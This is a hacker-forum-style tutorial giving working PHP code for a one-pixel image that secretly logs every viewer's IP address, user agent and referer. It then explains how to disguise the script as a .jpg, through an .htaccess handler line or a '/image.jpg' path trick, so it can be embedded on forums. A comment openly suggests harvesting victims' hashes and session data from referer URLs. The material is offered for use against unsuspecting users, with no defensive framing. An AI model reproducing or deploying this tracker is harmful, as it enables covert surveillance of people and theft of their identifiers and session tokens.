.:Intro:.

Written by t3hmadhatt3r -- Contact me at t3hmadhatt3r@gmail.com.

Hello mates. Here is a method of getting IP's and other info using the GD library.

.:The Code:.

Ok first we will use the GD library in php to generate a valid image in php. Here's some code to do just that:


<?php

/*
.:Made by t3hmadhtt3r -- t3hmadhatt3r@gmail.com:.
.:Enjoy!:.
*/

// Defining Variables

$IP = $_SERVER['REMOTE_ADDR']; // Saves the IP
$UA = $_SERVER['HTTP_USER_AGENT']; // Saves the User Agent
$RE = $_SERVER['HTTP_REFERER']; // Saves the Referer
$DATE = date('l jS of F Y h:i:s A');
$DATA = '<p>IP: '.$IP.'<br/><p>User Agent: '.$UA.'<br/><p>Referer: '.$RE.'<br/><p>Date: '.$DATE.'<br/><br/><br/>';

/*PS: Try using the referer logging feature to exploit forums and sites that keep useful info in the URL. Example: HTTP://WWW.LAMESITE.COM/POST.PHP?ID=4&HASH=(THE VICTIMS MD5 HASH)&USER=t3hmadhatt3r*/

// Writing the logs

$fp = fopen('Cool_Huh?.html', 'a');
fwrite($fp, $DATA);
fclose($fp);

// Behold the mighty GD Library ^_^

header("Content-type: image/png");
$img = ImageCreate (1, 1);
$bg = ImageColorAllocate ($img, 0, 0, 0);
$txt = ImageColorAllocate ($img, 0, 0, 0);
ImagePng($img);

// Later...
?>


More Info about that PHP GD library at http://us2.php.net/manual/en/book.image.php

.:Faking the Extension:.

Now we have a valid image but, how will we get it to work on forums that dont allow php as a image extension? Well there are two ways. One which is better than the other.

1. .htaccess (This is the best way)
If you are using a server that allows you to configure your own .htaccess file than you can add the following line to execute all files with the .jpg extension as a php file.


AddHandler application/x-httpd-php .jpg


Note: If you dont have a server that allows this I recommend looking at http://www.free-webhosts.com/search-webhosts.php?SA=.htaccess.

Now you can rename the php file to jpg and it will still work! Tricky Aye?

2. Tricky Technique (This way works just the same but is suspicious)
This technique can be done on most servers (I tried it on t35 and got some Permission errors... Probably because of the Jail Shell) but, It could get some attention from a admin pretty quickly. Just add a /image.jpg to the end of the PHP file.

Example:

http://subdomain.whatever.com/script.php/image.jpg

This will make it look like the extension is jpg but the php will ignore it and execute normally.

.:Ending:.

Now you can embed this image in forums just like any other image.

Enjoy the code!

 -- t3hmadhatt3r;